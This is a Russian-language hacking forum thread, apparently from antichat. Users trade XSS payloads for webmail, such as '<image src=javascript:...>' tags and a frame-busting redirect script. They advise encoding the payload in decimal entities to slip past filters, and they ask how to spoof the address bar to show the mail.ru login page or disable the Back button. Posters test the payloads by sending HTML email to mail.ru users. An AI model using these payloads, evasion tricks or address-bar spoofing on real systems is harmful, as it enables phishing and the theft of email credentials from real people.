1.
Ну, допустим, есть скрипт:
<image src=javascript :alert(xss)>
Действительно работает (в смысле alert выдает).

Но вот что писать вместо [alert(xss)] если мне надо замутить редирект на http://pupkin.ru/vasya.html (автоматически и в том же окне)?
Пытался сделать так:
<image src=javascript :document.location.replace('http://pupkin.ru/vasya.html')>
или
<image src=javascript :onLoad=window.location=("http://pupkin.ru/vasya.html")>
Без мазы.
Есть подозрения, что я облажался с синтаксисом.

Есть еще такая штука:
<SCRIPT type="text/javascript" LANGUAGE="JavaScript">
<!--
if (self.parent.frames.length == 0)
self.parent.location="http://pupkin.ru/vasya.html";
// -->
</SCRIPT>
Но как это все оформить в одну строчку???



2.
А кто-нибудь знает можно ли заменить в адресной строке [http://pupkin.ru/vasya.html] например на [http://win.mail.ru/cgi-bin/auth] или хотя бы отключить кнопку "Back"?

короче, двигай сюда http://antichat.ru/crackchat/HTML/ и кодируй строку
document.location.replace
в 10-ичную кодировку, и все получится...

ИЕС. Я СДЕЛАЛ ЭТО!

Но все-таки повторю свой второй вопрос (может кто знает):

Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?

Есть ли у кого на примете скрипты для этого?

2govorunov
А ты на какой почте юзал?

Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?

зайди на rootlab.ru, покрути там новостную ленту, все будет написано...

Подскажите почему не срабатывает <image src=javascript :document.location.replace('http://pupkin.ru/va sya.html')>

да уж.... там было все 10-тичной кодировки ....так работает отправляю с Outlook на mail.ru как HTML открываю ящик и ничего...кроме текста.... что тут не так ?